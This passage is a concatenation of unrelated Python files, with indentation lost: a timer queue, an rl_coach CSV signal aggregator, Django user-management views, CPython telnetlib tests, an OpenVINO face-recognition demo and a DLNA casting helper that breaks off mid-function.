return False
class TimerManager(object):
def __init__(self):
self._queue = []
self._new_timers = []
def add_timer(self, timer):
"""
called from client thread with a Timer object
"""
self._new_timers.append((timer.end, timer))
def service_timeouts(self):
"""
run callbacks on all expired timers
Called from the event thread
:return: next end time, or None
"""
queue = self._queue
if self._new_timers:
new_timers = self._new_timers
while new_timers:
heappush(queue, new_timers.pop())
if queue:
now = time.time()
while queue:
try:
timer = queue[0][1]
if timer.finish(now):
heappop(queue)
else:
return timer.end
except Exception:
log.exception("Exception while servicing timeout callback: ")
@property
def next_timeout(self):
try:
return self._queue[0][0]
except IndexError:
pass
|
signals_files_group.py
|
import os
from multiprocessing import Process, Manager
from os.path import basename
import pandas as pd
from rl_coach.dashboard_components.globals import x_axis_options, add_directory_csv_files, show_spinner, x_axis
from rl_coach.dashboard_components.signals_file_base import SignalsFileBase
from rl_coach.dashboard_components.signals_file import SignalsFile
class SignalsFilesGroup(SignalsFileBase):
def __init__(self, csv_paths, plot=None):
super().__init__(plot)
self.full_csv_paths = csv_paths
self.signals_files = []
if len(csv_paths) == 1 and os.path.isdir(csv_paths[0]):
self.signals_files = [SignalsFile(str(file), load=False, plot=plot) for file in add_directory_csv_files(csv_paths[0])]
else:
for csv_path in csv_paths:
if os.path.isdir(csv_path):
self.signals_files.append(SignalsFilesGroup(add_directory_csv_files(csv_path), plot=plot))
else:
self.signals_files.append(SignalsFile(str(csv_path), load=False, plot=plot))
parent_directory_path = os.path.abspath(os.path.join(os.path.dirname(csv_paths[0]), '..'))
if len(os.listdir(parent_directory_path)) == 1:
# get the parent directory name (since the current directory is the timestamp directory)
self.dir = parent_directory_path
else:
# get the common directory for all the experiments
self.dir = os.path.dirname('/'.join(os.path.commonprefix(csv_paths).split('/')[:-1]) + '/')
self.filename = '{} - Group({})'.format(basename(self.dir), len(self.signals_files))
self.signal_files_need_update = False
self.load()
def load_csv(self):
global x_axis
# load the csv's for all workers
processes = []
results = Manager().dict()
corrupted_files_idx = []
for idx, signal_file in enumerate(self.signals_files):
if not isinstance(signal_file, SignalsFilesGroup):
processes.append(Process(target=signal_file.load_csv, args=(idx, results)))
processes[-1].start()
[p.join() for p in processes]
# load csv's for SignalsFilesGroup serially for now. TODO: we should later parallelize this as well.
for idx, signal_file in enumerate(self.signals_files):
if isinstance(signal_file, SignalsFilesGroup):
signal_file.load_csv()
for idx, signal_file in enumerate(self.signals_files):
if len(list(results.keys())) > 0:
signal_file.csv, signal_file.last_modified = results[idx]
if not all(option in signal_file.csv.keys() for option in x_axis_options):
print("Warning: {} file seems to be corrupted and does contain the necessary columns "
"and will not be rendered".format(signal_file.filename))
corrupted_files_idx.append(idx)
# remove corrupted worker files
for file_idx in corrupted_files_idx:
del self.signals_files[file_idx]
# get the stats of all the columns
if len(self.signals_files) > 1:
transformed_signals_files = []
subsampling = None
for idx in range(len(self.signals_files)):
transformed_signals_files.append(self.signals_files[idx].csv.copy(deep=True))
# change the index to be the currently selected x axis
transformed_signals_files[-1].index = transformed_signals_files[-1][x_axis[0]]
# remove all duplicate index rows
transformed_signals_files[-1] = transformed_signals_files[-1][~transformed_signals_files[-1].index.duplicated()]
# fill up missing row indices. we are going to take the mean over the group and we want to make sure
# the entire group has some value for every possible index.
num_rows = int(transformed_signals_files[-1].index.values[-1])
transformed_signals_files[-1] = transformed_signals_files[-1].reindex(range(num_rows))
transformed_signals_files[-1].interpolate(inplace=True)
# sub sample the csv to max of 5000 indices (do the same subsampling to all files)
if subsampling is None:
subsampling = max(1, num_rows // 5000)
transformed_signals_files[-1] = transformed_signals_files[-1].iloc[::subsampling, :]
csv_group = pd.concat([signals_file for signals_file in transformed_signals_files])
columns_to_remove = [s for s in csv_group.columns if '/Stdev' in s] + \
[s for s in csv_group.columns if '/Min' in s] + \
[s for s in csv_group.columns if '/Max' in s]
for col in columns_to_remove:
del csv_group[col]
csv_group = csv_group.groupby(csv_group.index)
self.csv_mean = csv_group.mean()
self.csv_mean.columns = [s + '/Mean' for s in self.csv_mean.columns]
self.csv_stdev = csv_group.std()
self.csv_stdev.columns = [s + '/Stdev' for s in self.csv_stdev.columns]
self.csv_min = csv_group.min()
self.csv_min.columns = [s + '/Min' for s in self.csv_min.columns]
self.csv_max = csv_group.max()
self.csv_max.columns = [s + '/Max' for s in self.csv_max.columns]
# get the indices from the file with the least number of indices and which is not an evaluation worker
file_with_min_indices = transformed_signals_files[0]
for signals_file in transformed_signals_files:
if signals_file.shape[0] < file_with_min_indices.shape[0] and \
'Training reward' in signals_file.keys():
file_with_min_indices = signals_file
self.index_columns = file_with_min_indices[x_axis_options]
# concat the stats and the indices columns
num_rows = file_with_min_indices.shape[0]
self.csv = pd.concat([self.index_columns, self.csv_mean.head(num_rows), self.csv_stdev.head(num_rows),
self.csv_min.head(num_rows), self.csv_max.head(num_rows)], axis=1)
# remove the stat columns for the indices columns
columns_to_remove = [s + '/Mean' for s in x_axis_options] + \
[s + '/Stdev' for s in x_axis_options] + \
[s + '/Min' for s in x_axis_options] + \
[s + '/Max' for s in x_axis_options]
for col in columns_to_remove:
if col in self.csv.keys():
del self.csv[col]
else: # This is a group of a single file
self.csv = self.signals_files[0].csv
# remove NaNs
self.csv.fillna(value=0, inplace=True) # removing this line will make bollinger bands fail
for key in self.csv.keys():
if 'Stdev' in key and 'Evaluation' not in key:
self.csv[key] = self.csv[key].fillna(value=0)
self.signal_files_need_update = True
def reload_data(self):
SignalsFileBase.reload_data(self)
def update_x_axis_index(self):
SignalsFileBase.update_x_axis_index(self)
# update the x axis for the bollinger bands
for signal in self.signals.values():
if signal.has_bollinger_bands:
signal.set_bands_source()
def toggle_y_axis(self, signal_name=None):
for signal in self.signals.values():
if signal.selected:
signal.toggle_axis()
def change_averaging_window(self, new_size, force=False, signals=None):
SignalsFileBase.change_averaging_window(self, new_size, force, signals)
def set_signal_selection(self, signal_name, val):
self.show_files_separately(self.separate_files)
SignalsFileBase.set_signal_selection(self, signal_name, val)
def file_was_modified_on_disk(self):
for signal_file in self.signals_files:
if signal_file.file_was_modified_on_disk():
return True
return False
def show_files_separately(self, val):
self.separate_files = val
# lazy updating of the signals of each of the workers
if self.separate_files and self.signal_files_need_update:
for signal_file in self.signals_files:
signal_file.update_source_and_signals()
self.signal_files_need_update = False
for signal in self.signals.values():
if signal.selected:
if val:
signal.set_dash("4 4")
else:
signal.set_dash("")
for signal_file in self.signals_files:
try:
if val:
signal_file.set_signal_selection(signal.name, signal.selected)
else:
signal_file.set_signal_selection(signal.name, False)
except:
pass
|
views.py
|
from threading import Thread
from django.conf import settings
from django.contrib.sites.shortcuts import get_current_site
from django.http import HttpResponse
from django.shortcuts import redirect, get_object_or_404
from django.views import View
from drf_yasg.utils import swagger_auto_schema
from rest_framework import viewsets, status, mixins
from rest_framework.decorators import api_view, action
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from organisations.models import Organisation
from organisations.permissions import OrganisationUsersPermission, \
UserPermissionGroupPermission
from organisations.serializers import OrganisationSerializerFull, UserOrganisationSerializer
from users.exceptions import InvalidInviteError
from users.models import FFAdminUser, Invite, UserPermissionGroup
from users.serializers import UserListSerializer, UserPermissionGroupSerializerDetail, UserIdsSerializer
class AdminInitView(View):
def get(self, request):
if FFAdminUser.objects.count() == 0:
admin = FFAdminUser.objects.create_superuser(
settings.ADMIN_EMAIL,
settings.ADMIN_INITIAL_PASSWORD,
is_active=True,
)
admin.save()
return HttpResponse("ADMIN USER CREATED")
else:
return HttpResponse("FAILED TO INIT ADMIN USER. USER(S) ALREADY EXIST IN SYSTEM.")
class FFAdminUserViewSet(mixins.ListModelMixin, viewsets.GenericViewSet):
permission_classes = (IsAuthenticated, OrganisationUsersPermission)
pagination_class = None
def get_queryset(self):
if self.kwargs.get('organisation_pk'):
return FFAdminUser.objects.filter(organisations__id=self.kwargs.get('organisation_pk'))
else:
return FFAdminUser.objects.none()
def get_serializer_class(self, *args, **kwargs):
if self.action == 'update_role':
return UserOrganisationSerializer
return UserListSerializer
def get_serializer_context(self):
context = super(FFAdminUserViewSet, self).get_serializer_context()
if self.kwargs.get('organisation_pk'):
context['organisation'] = Organisation.objects.get(pk=self.kwargs.get('organisation_pk'))
return context
@action(detail=True, methods=['POST'], url_path='update-role')
def update_role(self, request, organisation_pk, pk):
user = self.get_object()
organisation = Organisation.objects.get(pk=organisation_pk)
user_organisation = user.get_user_organisation(organisation)
serializer = self.get_serializer(instance=user_organisation, data=request.data, partial=True)
serializer.is_valid(raise_exception=True)
serializer.save()
return Response(UserListSerializer(user, context={'organisation': organisation}).data)
def password_reset_redirect(request, uidb64, token):
protocol = "https" if request.is_secure() else "https"
current_site = get_current_site(request)
domain = current_site.domain
return redirect(protocol + "://" + domain + "/password-reset/" + uidb64 + "/" + token)
@api_view(['POST'])
def join_organisation(request, invite_hash):
invite = get_object_or_404(Invite, hash=invite_hash)
try:
request.user.join_organisation(invite)
except InvalidInviteError as e:
error_data = {'detail': str(e)}
return Response(data=error_data, status=status.HTTP_400_BAD_REQUEST)
if invite.organisation.over_plan_seats_limit():
Thread(target=FFAdminUser.send_organisation_over_limit_alert, args=[invite.organisation]).start()
return Response(OrganisationSerializerFull(invite.organisation, context={'request': request}).data,
status=status.HTTP_200_OK)
class UserPermissionGroupViewSet(viewsets.ModelViewSet):
permission_classes = [IsAuthenticated, UserPermissionGroupPermission]
serializer_class = UserPermissionGroupSerializerDetail
def get_queryset(self):
organisation_pk = self.kwargs.get('organisation_pk')
return UserPermissionGroup.objects.filter(organisation__pk=organisation_pk)
def perform_create(self, serializer):
serializer.save(organisation_id=self.kwargs['organisation_pk'])
def perform_update(self, serializer):
serializer.save(organisation_id=self.kwargs['organisation_pk'])
@swagger_auto_schema(request_body=UserIdsSerializer, responses={200: UserPermissionGroupSerializerDetail})
@action(detail=True, methods=['POST'], url_path='add-users')
def add_users(self, request, organisation_pk, pk):
group = self.get_object()
try:
group.add_users_by_id(request.data['user_ids'])
except FFAdminUser.DoesNotExist as e:
return Response({'detail': str(e)}, status=status.HTTP_400_BAD_REQUEST)
return Response(UserPermissionGroupSerializerDetail(instance=group).data)
@swagger_auto_schema(request_body=UserIdsSerializer, responses={200: UserPermissionGroupSerializerDetail})
@action(detail=True, methods=['POST'], url_path='remove-users')
def remove_users(self, request, organisation_pk, pk):
group = self.get_object()
group.remove_users_by_id(request.data['user_ids'])
return Response(UserPermissionGroupSerializerDetail(instance=group).data)
|
test_telnetlib.py
|
import socket
import select
import telnetlib
import time
import contextlib
import unittest
from unittest import TestCase
from test import support
threading = support.import_module('threading')
HOST = support.HOST
def server(evt, serv):
serv.listen(5)
evt.set()
try:
conn, addr = serv.accept()
conn.close()
except socket.timeout:
pass
finally:
serv.close()
class GeneralTests(TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(60) # Safety net. Look issue 11812
self.port = support.bind_port(self.sock)
self.thread = threading.Thread(target=server, args=(self.evt,self.sock))
self.thread.setDaemon(True)
self.thread.start()
self.evt.wait()
def tearDown(self):
self.thread.join()
def testBasic(self):
# connects
telnet = telnetlib.Telnet(HOST, self.port)
telnet.sock.close()
def testTimeoutDefault(self):
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
telnet = telnetlib.Telnet(HOST, self.port)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(telnet.sock.gettimeout(), 30)
telnet.sock.close()
def testTimeoutNone(self):
# None, having other default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
telnet = telnetlib.Telnet(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertTrue(telnet.sock.gettimeout() is None)
telnet.sock.close()
def testTimeoutValue(self):
telnet = telnetlib.Telnet(HOST, self.port, timeout=30)
self.assertEqual(telnet.sock.gettimeout(), 30)
telnet.sock.close()
def testTimeoutOpen(self):
telnet = telnetlib.Telnet()
telnet.open(HOST, self.port, timeout=30)
self.assertEqual(telnet.sock.gettimeout(), 30)
telnet.sock.close()
class SocketStub(object):
''' a socket proxy that re-defines sendall() '''
def __init__(self, reads=()):
self.reads = list(reads) # Intentionally make a copy.
self.writes = []
self.block = False
def sendall(self, data):
self.writes.append(data)
def recv(self, size):
out = b''
while self.reads and len(out) < size:
out += self.reads.pop(0)
if len(out) > size:
self.reads.insert(0, out[size:])
out = out[:size]
return out
class TelnetAlike(telnetlib.Telnet):
def fileno(self):
raise NotImplementedError()
def close(self): pass
def sock_avail(self):
return (not self.sock.block)
def msg(self, msg, *args):
with support.captured_stdout() as out:
telnetlib.Telnet.msg(self, msg, *args)
self._messages += out.getvalue()
return
def mock_select(*s_args):
block = False
for l in s_args:
for fob in l:
if isinstance(fob, TelnetAlike):
block = fob.sock.block
if block:
return [[], [], []]
else:
return s_args
class MockPoller(object):
test_case = None # Set during TestCase setUp.
def __init__(self):
self._file_objs = []
def register(self, fd, eventmask):
self.test_case.assertTrue(hasattr(fd, 'fileno'), fd)
self.test_case.assertEqual(eventmask, select.POLLIN|select.POLLPRI)
self._file_objs.append(fd)
def poll(self, timeout=None):
block = False
for fob in self._file_objs:
if isinstance(fob, TelnetAlike):
block = fob.sock.block
if block:
return []
else:
return zip(self._file_objs, [select.POLLIN]*len(self._file_objs))
def unregister(self, fd):
self._file_objs.remove(fd)
@contextlib.contextmanager
def test_socket(reads):
def new_conn(*ignored):
return SocketStub(reads)
try:
old_conn = socket.create_connection
socket.create_connection = new_conn
yield None
finally:
socket.create_connection = old_conn
return
def test_telnet(reads=(), cls=TelnetAlike, use_poll=None):
''' return a telnetlib.Telnet object that uses a SocketStub with
reads queued up to be read '''
for x in reads:
assert type(x) is bytes, x
with test_socket(reads):
telnet = cls('dummy', 0)
telnet._messages = '' # debuglevel output
if use_poll is not None:
if use_poll and not telnet._has_poll:
raise unittest.SkipTest('select.poll() required.')
telnet._has_poll = use_poll
return telnet
class ExpectAndReadTestCase(TestCase):
def setUp(self):
self.old_select = select.select
select.select = mock_select
self.old_poll = False
if hasattr(select, 'poll'):
self.old_poll = select.poll
select.poll = MockPoller
MockPoller.test_case = self
def tearDown(self):
if self.old_poll:
MockPoller.test_case = None
select.poll = self.old_poll
select.select = self.old_select
class ReadTests(ExpectAndReadTestCase):
def test_read_until(self):
"""
read_until(expected, timeout=None)
test the blocking version of read_util
"""
want = [b'xxxmatchyyy']
telnet = test_telnet(want)
data = telnet.read_until(b'match')
self.assertEqual(data, b'xxxmatch', msg=(telnet.cookedq, telnet.rawq, telnet.sock.reads))
reads = [b'x' * 50, b'match', b'y' * 50]
expect = b''.join(reads[:-1])
telnet = test_telnet(reads)
data = telnet.read_until(b'match')
self.assertEqual(data, expect)
def test_read_until_with_poll(self):
"""Use select.poll() to implement telnet.read_until()."""
want = [b'x' * 10, b'match', b'y' * 10]
telnet = test_telnet(want, use_poll=True)
select.select = lambda *_: self.fail('unexpected select() call.')
data = telnet.read_until(b'match')
self.assertEqual(data, b''.join(want[:-1]))
def test_read_until_with_select(self):
"""Use select.select() to implement telnet.read_until()."""
want = [b'x' * 10, b'match', b'y' * 10]
telnet = test_telnet(want, use_poll=False)
if self.old_poll:
select.poll = lambda *_: self.fail('unexpected poll() call.')
data = telnet.read_until(b'match')
self.assertEqual(data, b''.join(want[:-1]))
def test_read_all(self):
"""
read_all()
Read all data until EOF; may block.
"""
reads = [b'x' * 500, b'y' * 500, b'z' * 500]
expect = b''.join(reads)
telnet = test_telnet(reads)
data = telnet.read_all()
self.assertEqual(data, expect)
return
def test_read_some(self):
"""
read_some()
Read at least one byte or EOF; may block.
"""
# test 'at least one byte'
telnet = test_telnet([b'x' * 500])
data = telnet.read_some()
self.assertTrue(len(data) >= 1)
# test EOF
telnet = test_telnet()
data = telnet.read_some()
self.assertEqual(b'', data)
def _read_eager(self, func_name):
"""
read_*_eager()
Read all data available already queued or on the socket,
without blocking.
"""
want = b'x' * 100
telnet = test_telnet([want])
func = getattr(telnet, func_name)
telnet.sock.block = True
self.assertEqual(b'', func())
telnet.sock.block = False
data = b''
while True:
try:
data += func()
except EOFError:
break
self.assertEqual(data, want)
def test_read_eager(self):
# read_eager and read_very_eager make the same gaurantees
# (they behave differently but we only test the gaurantees)
self._read_eager('read_eager')
self._read_eager('read_very_eager')
# NB -- we need to test the IAC block which is mentioned in the
# docstring but not in the module docs
def read_very_lazy(self):
want = b'x' * 100
telnet = test_telnet([want])
self.assertEqual(b'', telnet.read_very_lazy())
while telnet.sock.reads:
telnet.fill_rawq()
data = telnet.read_very_lazy()
self.assertEqual(want, data)
self.assertRaises(EOFError, telnet.read_very_lazy)
def test_read_lazy(self):
want = b'x' * 100
telnet = test_telnet([want])
self.assertEqual(b'', telnet.read_lazy())
data = b''
while True:
try:
read_data = telnet.read_lazy()
data += read_data
if not read_data:
telnet.fill_rawq()
except EOFError:
break
self.assertTrue(want.startswith(data))
self.assertEqual(data, want)
class nego_collector(object):
def __init__(self, sb_getter=None):
self.seen = b''
self.sb_getter = sb_getter
self.sb_seen = b''
def do_nego(self, sock, cmd, opt):
self.seen += cmd + opt
if cmd == tl.SE and self.sb_getter:
sb_data = self.sb_getter()
self.sb_seen += sb_data
tl = telnetlib
class WriteTests(TestCase):
'''The only thing that write does is replace each tl.IAC for
tl.IAC+tl.IAC'''
def test_write(self):
data_sample = [b'data sample without IAC',
b'data sample with' + tl.IAC + b' one IAC',
b'a few' + tl.IAC + tl.IAC + b' iacs' + tl.IAC,
tl.IAC,
b'']
for data in data_sample:
telnet = test_telnet()
telnet.write(data)
written = b''.join(telnet.sock.writes)
self.assertEqual(data.replace(tl.IAC,tl.IAC+tl.IAC), written)
class OptionTests(TestCase):
# RFC 854 commands
cmds = [tl.AO, tl.AYT, tl.BRK, tl.EC, tl.EL, tl.GA, tl.IP, tl.NOP]
def _test_command(self, data):
""" helper for testing IAC + cmd """
telnet = test_telnet(data)
data_len = len(b''.join(data))
nego = nego_collector()
telnet.set_option_negotiation_callback(nego.do_nego)
txt = telnet.read_all()
cmd = nego.seen
self.assertTrue(len(cmd) > 0) # we expect at least one command
self.assertIn(cmd[:1], self.cmds)
self.assertEqual(cmd[1:2], tl.NOOPT)
self.assertEqual(data_len, len(txt + cmd))
nego.sb_getter = None # break the nego => telnet cycle
def test_IAC_commands(self):
for cmd in self.cmds:
self._test_command([tl.IAC, cmd])
self._test_command([b'x' * 100, tl.IAC, cmd, b'y'*100])
self._test_command([b'x' * 10, tl.IAC, cmd, b'y'*10])
# all at once
self._test_command([tl.IAC + cmd for (cmd) in self.cmds])
def test_SB_commands(self):
# RFC 855, subnegotiations portion
send = [tl.IAC + tl.SB + tl.IAC + tl.SE,
tl.IAC + tl.SB + tl.IAC + tl.IAC + tl.IAC + tl.SE,
tl.IAC + tl.SB + tl.IAC + tl.IAC + b'aa' + tl.IAC + tl.SE,
tl.IAC + tl.SB + b'bb' + tl.IAC + tl.IAC + tl.IAC + tl.SE,
tl.IAC + tl.SB + b'cc' + tl.IAC + tl.IAC + b'dd' + tl.IAC + tl.SE,
]
telnet = test_telnet(send)
nego = nego_collector(telnet.read_sb_data)
telnet.set_option_negotiation_callback(nego.do_nego)
txt = telnet.read_all()
self.assertEqual(txt, b'')
want_sb_data = tl.IAC + tl.IAC + b'aabb' + tl.IAC + b'cc' + tl.IAC + b'dd'
self.assertEqual(nego.sb_seen, want_sb_data)
self.assertEqual(b'', telnet.read_sb_data())
nego.sb_getter = None # break the nego => telnet cycle
def test_debuglevel_reads(self):
# test all the various places that self.msg(...) is called
given_a_expect_b = [
# Telnet.fill_rawq
(b'a', ": recv b''\n"),
# Telnet.process_rawq
(tl.IAC + bytes([88]), ": IAC 88 not recognized\n"),
(tl.IAC + tl.DO + bytes([1]), ": IAC DO 1\n"),
(tl.IAC + tl.DONT + bytes([1]), ": IAC DONT 1\n"),
(tl.IAC + tl.WILL + bytes([1]), ": IAC WILL 1\n"),
(tl.IAC + tl.WONT + bytes([1]), ": IAC WONT 1\n"),
]
for a, b in given_a_expect_b:
telnet = test_telnet([a])
telnet.set_debuglevel(1)
txt = telnet.read_all()
self.assertIn(b, telnet._messages)
return
def test_debuglevel_write(self):
telnet = test_telnet()
telnet.set_debuglevel(1)
telnet.write(b'xxx')
expected = "send b'xxx'\n"
self.assertIn(expected, telnet._messages)
def test_debug_accepts_str_port(self):
# Issue 10695
with test_socket([]):
telnet = TelnetAlike('dummy', '0')
telnet._messages = ''
telnet.set_debuglevel(1)
telnet.msg('test')
self.assertRegex(telnet._messages, r'0.*test')
class ExpectTests(ExpectAndReadTestCase):
def test_expect(self):
"""
expect(expected, [timeout])
Read until the expected string has been seen, or a timeout is
hit (default is no timeout); may block.
"""
want = [b'x' * 10, b'match', b'y' * 10]
telnet = test_telnet(want)
(_,_,data) = telnet.expect([b'match'])
self.assertEqual(data, b''.join(want[:-1]))
def test_expect_with_poll(self):
"""Use select.poll() to implement telnet.expect()."""
want = [b'x' * 10, b'match', b'y' * 10]
telnet = test_telnet(want, use_poll=True)
select.select = lambda *_: self.fail('unexpected select() call.')
(_,_,data) = telnet.expect([b'match'])
self.assertEqual(data, b''.join(want[:-1]))
def test_expect_with_select(self):
"""Use select.select() to implement telnet.expect()."""
want = [b'x' * 10, b'match', b'y' * 10]
telnet = test_telnet(want, use_poll=False)
if self.old_poll:
select.poll = lambda *_: self.fail('unexpected poll() call.')
(_,_,data) = telnet.expect([b'match'])
self.assertEqual(data, b''.join(want[:-1]))
def test_main(verbose=None):
support.run_unittest(GeneralTests, ReadTests, WriteTests, OptionTests,
ExpectTests)
if __name__ == '__main__':
test_main()
|
modelArchitectureX.py
|
from openvino.inference_engine import IECore
import threading
import time
from multiprocessing import Process
import pickle
import cv2
import os
import numpy as np
from scipy.spatial.distance import cosine
from numpy import load
recognizedIdentity=['']
INPUT_STREAM=r"C:\Users\LENOVO\Downloads\Power Series Finale- Tariq and Ghost Argue.mp4"
#detection model
det_model=r"C:\Users\LENOVO\Desktop\Detect&Recognize\intel\face-detection-0202\FP16\face-detection-0202.xml"
det_weights=os.path.splitext(det_model)[0]+'.bin'
#recognition model
recogModel=r"C:\Users\LENOVO\Desktop\Detect&Recognize\face_net_mobile_face\model-0000.xml"
recogweights=os.path.splitext(recogModel)[0]+'.bin'
#Load the plugin
plugin=IECore()
'''
Preparing the recognition model for the inference engine
'''
recogPlugin=plugin
recogNet=recogPlugin.read_network(model=recogModel,weights=recogweights)
recogExecNet=recogPlugin.load_network(network=recogNet,device_name="MYRIAD")
recog_input_blob=list(recogNet.input_info.keys())[0]
recog_output_blob=next(iter(recogNet.outputs))
rb,rc,rh,rw=recogNet.input_info[recog_input_blob].input_data.shape
'''
Prepraring the detection model for the inference engine
'''
detPlugin=plugin
detNet=detPlugin.read_network(model=det_model,weights=det_weights)
detExecNet=detPlugin.load_network(network=detNet,device_name="MYRIAD")
det_input_blob=list(detNet.input_info.keys())[0]
det_output_blob=next(iter(detNet.outputs))
db,dc,dh,dw=detNet.input_info[det_input_blob].input_data.shape
def load_embedding():
pickle_in=open('userEmbeddings.pickle','rb')
return pickle.load(pickle_in)
def is_match(known_embedding,candidate_embedding,thresh=0.55):
for(name,embedding) in known_embedding.items():
score=cosine(embedding,candidate_embedding)
if score<=thresh:
print(name)
recognizedIdentity[0]=name
# else:
# recognizedIdentity.append('Unknown')
# print(recognizedIdentity)
def preprocessing(input_image,height,width):
preprocessed_image=cv2.resize(input_image,(width,height))
preprocessed_image=preprocessed_image.transpose((2,0,1))
preprocessed_image=preprocessed_image.reshape(1,3,height,width)
return preprocessed_image
def perform_facerecognition(face):
p_image=preprocessing(face,rh,rw)
recog_infer_request=recogExecNet.start_async(request_id=0,inputs={recog_input_blob:p_image})
status=recogExecNet.requests[0].wait(-1)
if status==0:
result=recogExecNet.requests[0].outputs[recog_output_blob]
candidate_embedding=result[0]
known_embedding=load_embedding()
x=threading.Thread(target=is_match,daemon=True,args=(known_embedding,candidate_embedding,))
x.start()
x.join()
return recognizedIdentity[0]
def extract_face(image,result,width,height):
for box in result[0][0]:
if box[2]>0.5:
xmin=int(box[3]*width)
ymin=int(box[4]*height)
xmax=int(box[5]*width)
ymax=int(box[6]*height)
face=image[ymin:ymax,xmin:xmax]
text=perform_facerecognition(face)
recognizedIdentity[0]=''
cv2.putText(image,text,(xmin,ymin-10),cv2.FONT_HERSHEY_SIMPLEX,0.9,(36,255,12),2)
cv2.rectangle(image,(xmin,ymin),(xmax,ymax),(0,0,255),1)
image=cv2.rectangle(image,(xmin,ymin),(xmax,ymax),(0,0,255),1)
return image
cap=cv2.VideoCapture(INPUT_STREAM)
while(cap.isOpened()):
flag,frame=cap.read()
width=int(cap.get(3))
height=int(cap.get(4))
pimage=preprocessing(frame,dh,dw)
det_infer_request=detExecNet.start_async(request_id=0,inputs={det_input_blob:pimage})
status=detExecNet.requests[0].wait(-1)
if status==0:
result=detExecNet.requests[0].outputs[det_output_blob]
img=extract_face(frame,result,width,height)
cv2.imshow('frame',img)
k=cv2.waitKey(1) & 0xFF
if k==ord('q'):
break
cap.release()
cv2.destroyAllWindows()
|
app.py
|
#!/usr/bin/env python3
# encoding: UTF-8
import re, socket, os, time, sys, threading, pkgutil, json
from xml.sax.saxutils import escape as xmlescape
from urllib.error import HTTPError
from twisted.internet import reactor
from twisted.web.resource import Resource
from twisted.web.server import Site
from twisted.web.static import File
import xml.etree.ElementTree as ET
if sys.version_info.major == 3:
import urllib.request as urllibreq
import urllib.parse as urllibparse
else:
import urllib2 as urllibreq
import urlparse as urllibparse
SSDP_BROADCAST_PORT = 1900
SSDP_BROADCAST_ADDR = "239.255.255.250"
SSDP_GROUP = (SSDP_BROADCAST_ADDR, SSDP_BROADCAST_PORT)
SSDP_BROADCAST_PARAMS = [
"M-SEARCH * HTTP/1.1",
"HOST: %s:%d" % SSDP_GROUP,
"MAN: \"ssdp:discover\"",
"MX: 10", #10/3 ?
"ST: ssdp:all",
"",
""]
SSDP_BROADCAST_MSG = "\r\n".join(SSDP_BROADCAST_PARAMS)
UPNP_DEFAULT_SERVICE_TYPE = "urn:schemas-upnp-org:service:AVTransport:1"
class dlnaTv:
def __init__(self):
'''
dlnaTv object to start a dlna connection to compatible TV
'''
self.time = 12.0 #seems like 12 seconds is the sweet spot
self.ports = 9000
def get_devices(self, timeout=10.0):
'''
search on local network devices that have the upnp service to broadcast dlna
timeout : <float> set a timeout before stopping searching for devices,
higher timeout has a higher chance to find a device
'''
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
s.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 4)
s.bind(("", SSDP_BROADCAST_PORT + 10))
s.sendto(SSDP_BROADCAST_MSG.encode("UTF-8"), SSDP_GROUP)
s.settimeout(timeout)
devices = []
while True:
try:
data, ip = s.recvfrom(4096)
except socket.timeout:
s.close()
break
try:
info = [a.split(":", 1) for a in data.decode("UTF-8").split("\r\n")[1:]]
device = dict([(a[0].strip().lower(), a[1].strip()) for a in info if len(a) >= 2])
devices.append(device)
except Exception:
s.close()
s.close()
devices_urls = [dev["location"] for dev in devices if "AVTransport" in dev["st"]]
devices = [self.register_device(location_url) for location_url in devices_urls]
return devices
def register_device(self, location_url):
'''
build a device info to comunicate with
return <dict> contains the device info
'''
xml = urllibreq.urlopen(location_url).read().decode("UTF-8")
xml = re.sub(" xmlns=\"[^\"]+\"", "", xml, count=1)
info = ET.fromstring(xml)
location = urllibparse.urlparse(location_url)
hostname = location.hostname
friendly_name = info.find("./device/friendlyName").text
path = info.find("./device/serviceList/service/[serviceType='{0}']/controlURL".format(UPNP_DEFAULT_SERVICE_TYPE)).text
action_url = urllibparse.urljoin(location_url, path)
device = {
"location": location_url,
"hostname": hostname,
"friendly_name": friendly_name,
"action_url": action_url,
"st": UPNP_DEFAULT_SERVICE_TYPE
}
return device
def set_files(self, files, serve_ip, serve_port):
'''
build url to file for dlna stream
'''
files_index = {file_key: (os.path.basename(file_path),
os.path.abspath(file_path),
os.path.dirname(os.path.abspath(file_path)))
for file_key, file_path in files.items()}
files_serve = {file_name: file_path
for file_name, file_path, file_dir in files_index.values()}
files_urls = {
file_key: "http://{0}:{1}/{2}/{3}".format(serve_ip, self.ports, file_key, file_name)
for file_key, (file_name, file_path, file_dir)
in files_index.items()}
return files_index, files_serve, files_urls
def start_server(self, files, serve_ip):
'''
create a server to stream a video
'''
files_index, files_serve, files_urls = self.set_files(files, serve_ip, self.ports)
root = Resource()
for file_key, (file_name, file_path, file_dir) in files_index.items():
root.putChild(file_key.encode("utf-8"), Resource())
root.children[file_key.encode("utf-8")].putChild(
file_name.encode("utf-8"), File(file_path))
if not reactor.running:
reactor.listenTCP(self.ports, Site(root))
threading.Thread(target=reactor.run, kwargs={"installSignalHandlers": False}).start()
else:
reactor.listenTCP(self.ports, Site(root))
return files_urls
def get_serve_ip(self, target_ip, target_port=80):
'''
get local device IP
return <str> ip
'''
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((target_ip, target_port))
serve_ip = s.getsockname()[0]
s.close()
return serve_ip
def send_dlna_action(self, device, data, action):
'''
send a dlna action to a device
'''
#action_data = pkgutil.get_data(
# "nanodlna", "templates/action-{0}.xml".format(action)).decode("UTF-8")
with open("{0}\\xml\\action-{1}.xml".format(os.path.dirname(__file__), action), 'r') as e:
action_data = e.read()
e.close()
action_data = action_data.format(**data).encode("UTF-8")
headers = {
"Content-Type": "text/xml; charset=\"utf-8\"",
"Content-Length": "{0}".format(len(action_data)),
"Connection": "close",
"SOAPACTION": "\"{0}#{1}\"".format(device["st"], action)
}
request = urllibreq.Request(device["action_url"], action_data, headers)
try:
